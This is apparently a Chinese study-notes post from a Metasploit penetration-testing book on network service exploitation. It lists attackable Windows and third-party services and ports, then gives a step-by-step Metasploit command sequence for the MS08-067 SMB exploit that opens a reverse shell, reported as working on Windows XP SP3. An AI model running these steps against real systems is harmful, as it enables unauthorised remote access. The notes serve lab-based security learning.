Metasploit渗透测试五之网络服务渗透

了解缓冲区漏洞原理

Windows自带网络服务攻击

NetBIOS,137,138
SMB,139,445
MSRPC,135,139,445
RDP远程桌面,3389

Windows微软网络服务攻击

IIS,MSSQL,FTP,SMTP,DNS,WINS,EXCHANGE

Windowsd第三方服务攻击

Apache,IBM WebSphere,Tomcat,Oracle,Mysql,Serv-U,FileZilla

针对工业控制

了解即可

实操MS08-067过程

这是利用SMB445端口的漏洞,2K3可能我装的版本已经自带补丁,没有成功。XPSP3下成功

search ms08_067
//搜索有关ms08_67有关模块
use exploit/windows/smb/ms08_067_netapi
//使用攻击模块
show paylaods
//列出攻击载荷,就是shellcode
set payload generic/shell_reverse_tcp
//使用攻击载荷
show options
//列出模块有关参数
set Rhost 192.168.2.245
//设置目标IP
set lhost 192.196.2.249
//设置接收SHELL地址
show target 34
//选择攻击平台,这个要选对。否者会对目标主机的服务奔溃导致端口关闭。
exploit

MS08-067分析

篇幅问题,查看书本中#200页开始
了解源码含义,IDA静态跟OD动态定位漏洞位置

Oracle数据库

利用现用的模块,针对存在漏洞的exploit,自己修改适合的溢出返回地址及代码
具体实现#216页

Linux服务渗透

Linux因开源相对windows的漏洞较少。
而且版本较多,所以攻击模块有很多时候需要自己搭建对于的版本自己GDB调试修改
书中分析了编号为:CVE-2010-2063 页码为:#234

发表评论

邮箱地址不会被公开。 必填项已用*标注